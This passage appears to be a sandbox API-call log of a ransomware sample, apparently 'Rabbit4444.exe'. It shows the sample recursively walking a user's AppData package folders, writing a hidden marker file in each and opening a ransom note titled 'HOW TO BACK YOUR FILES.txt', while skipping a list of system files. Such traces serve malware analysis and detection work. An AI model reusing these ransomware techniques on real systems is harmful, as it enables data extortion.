lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState" [0056.206] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124e58 | out: hHeap=0xe0000) returned 1 [0056.206] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0056.206] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState" [0056.206] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState\\" [0056.206] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0056.206] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.207] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.210] FlushFileBuffers (hFile=0x27c) returned 1 [0056.211] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.211] CloseHandle (hObject=0x27c) returned 1 [0056.211] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState") returned 95 [0056.211] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.211] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2c8c8f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xead204b3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0056.212] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.212] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.212] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.212] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.212] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2c8c8f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xead204b3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.212] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.212] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.212] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.212] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.212] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.212] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xead204b3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xead204b3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xead466dc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.212] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.212] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.212] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xead204b3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xead204b3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xead466dc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.212] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0056.212] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.212] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.212] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.213] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.213] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.213] CloseHandle (hObject=0x278) returned 1 [0056.213] CloseHandle (hObject=0x27c) returned 1 [0056.213] GetCurrentThreadId () returned 0xd98 [0056.213] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0056.213] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState" [0056.213] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.213] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0056.213] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState" [0056.213] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\" [0056.213] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0056.213] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.216] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.219] FlushFileBuffers (hFile=0x27c) returned 1 [0056.220] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.220] CloseHandle (hObject=0x27c) returned 1 [0056.220] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState") returned 93 [0056.220] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.220] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a9b49e8, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xead466dc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0056.220] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.220] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.220] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.220] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.220] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a9b49e8, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xead466dc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.221] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.221] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.221] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.221] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.221] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.221] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xead466dc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xead466dc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xead466dc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.221] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.221] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.221] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5aa5c7c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a8c000, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe5aa5c7c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed", cAlternateFileName="")) returned 1 [0056.221] lstrcmpiW (lpString1="Indexed", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.221] lstrcmpiW (lpString1="Indexed", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.221] lstrcmpiW (lpString1="Indexed", lpString2="Rabbit4444.exe") returned -1 [0056.221] lstrcmpiW (lpString1="Indexed", lpString2=".") returned 1 [0056.221] lstrcmpiW (lpString1="Indexed", lpString2="..") returned 1 [0056.221] lstrcmpiW (lpString1="Indexed", lpString2="windows") returned -1 [0056.221] lstrcmpiW (lpString1="Indexed", lpString2="bootmgr") returned 1 [0056.221] lstrcmpiW (lpString1="Indexed", lpString2="pagefile.sys") returned -1 [0056.221] lstrcmpiW (lpString1="Indexed", lpString2="boot") returned 1 [0056.221] lstrcmpiW (lpString1="Indexed", lpString2="ids.txt") returned 1 [0056.221] lstrcmpiW (lpString1="Indexed", lpString2="NTUSER.DAT") returned -1 [0056.221] lstrcpyW (in: lpString1=0x130ebf4, lpString2="Indexed" | out: lpString1="Indexed") returned="Indexed" [0056.221] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0056.221] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108838 [0056.221] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122148 | out: ListHead=0xf68b0, ListEntry=0x122148) returned 0x1222c8 [0056.221] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5aa5c7c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a8c000, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe5aa5c7c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed", cAlternateFileName="")) returned 0 [0056.221] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0056.221] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.221] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.224] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.224] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.224] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.224] CloseHandle (hObject=0x278) returned 1 [0056.224] CloseHandle (hObject=0x27c) returned 1 [0056.224] GetCurrentThreadId () returned 0xd98 [0056.224] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122148 [0056.224] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed" [0056.224] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108838 | out: hHeap=0xe0000) returned 1 [0056.224] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0056.224] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed" [0056.224] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\" [0056.224] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\.BFC0E91B00AE8A0620D3" [0056.224] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.226] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.228] FlushFileBuffers (hFile=0x27c) returned 1 [0056.229] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.229] CloseHandle (hObject=0x27c) returned 1 [0056.230] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed") returned 101 [0056.230] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.230] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5aa5c7c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a8c000, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xead6c99f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0056.230] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.230] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.230] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.230] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.230] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5aa5c7c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a8c000, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xead6c99f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.230] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.230] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.230] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.230] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.230] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.230] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xead6c99f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xead6c99f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xead6c99f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.230] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.230] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.230] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5aa5c7c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe5aa5c7c, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xe5aa5c7c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0056.230] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.230] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.230] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0056.230] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0056.230] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0056.230] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0056.230] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0056.231] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0056.231] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0056.231] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0056.231] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0056.231] lstrcpyW (in: lpString1=0x130ec04, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0056.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0056.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xde) returned 0x124d90 [0056.231] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x1222c8 [0056.231] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5aa5c7c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe5aa5c7c, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xe5aa5c7c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 0 [0056.231] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0056.231] lstrcpyW (in: lpString1=0x130ec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR 